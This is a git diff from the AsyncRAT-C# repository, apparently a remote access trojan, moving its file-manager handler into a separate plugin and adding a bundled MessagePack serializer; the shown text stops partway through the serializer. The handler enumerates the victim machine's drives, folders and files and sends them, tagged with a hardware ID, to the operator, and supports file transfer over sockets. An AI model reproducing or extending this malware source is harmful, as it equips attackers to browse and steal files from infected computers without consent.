@@ -0,0 +1,58 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}
+ Library
+ Properties
+ Plugin
+ FileManager
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Handler/FileManager.cs
similarity index 94%
rename from AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs
rename to AsyncRAT-C#/Plugin/FileManager/FileManager/Handler/FileManager.cs
index 4476f9b..9d40f57 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Handler/FileManager.cs
@@ -1,6 +1,4 @@
-using Client.MessagePack;
-using Client.Connection;
-using System;
+using System;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging;
@@ -13,8 +11,9 @@ using System.Security.Authentication;
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;
using System.Threading;
+using Plugin.MessagePack;
-namespace Client.Handle_Packet
+namespace Plugin.Handler
{
public class FileManager
{
@@ -147,6 +146,7 @@ namespace Client.Handle_Packet
DriveInfo[] allDrives = DriveInfo.GetDrives();
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "getDrivers";
StringBuilder sbDriver = new StringBuilder();
foreach (DriveInfo d in allDrives)
@@ -156,7 +156,7 @@ namespace Client.Handle_Packet
sbDriver.Append(d.Name + "-=>" + d.DriveType + "-=>");
}
msgpack.ForcePathObject("Driver").AsString = sbDriver.ToString();
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
}
catch { }
@@ -169,6 +169,7 @@ namespace Client.Handle_Packet
Debug.WriteLine($"Getting [{path}]");
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "getPath";
StringBuilder sbFolder = new StringBuilder();
StringBuilder sbFile = new StringBuilder();
@@ -192,7 +193,7 @@ namespace Client.Handle_Packet
msgpack.ForcePathObject("Folder").AsString = sbFolder.ToString();
msgpack.ForcePathObject("File").AsString = sbFile.ToString();
msgpack.ForcePathObject("CurrentPath").AsString = path.ToString();
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
catch (Exception ex)
{
@@ -232,6 +233,7 @@ namespace Client.Handle_Packet
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "socketDownload";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "pre";
msgpack.ForcePathObject("DWID").AsString = dwid;
msgpack.ForcePathObject("File").AsString = file;
@@ -241,6 +243,7 @@ namespace Client.Handle_Packet
MsgPack msgpack2 = new MsgPack();
msgpack2.ForcePathObject("Packet").AsString = "socketDownload";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack2.ForcePathObject("Command").AsString = "save";
msgpack2.ForcePathObject("DWID").AsString = dwid;
msgpack2.ForcePathObject("Name").AsString = Path.GetFileName(file);
@@ -291,6 +294,7 @@ namespace Client.Handle_Packet
TempSocket tempSocket = new TempSocket();
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "reqUploadFile";
msgpack.ForcePathObject("ID").AsString = id;
tempSocket.Send(msgpack.Encode2Bytes());
@@ -302,9 +306,12 @@ namespace Client.Handle_Packet
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "error";
msgpack.ForcePathObject("Message").AsString = ex;
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
}
+
}
+
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
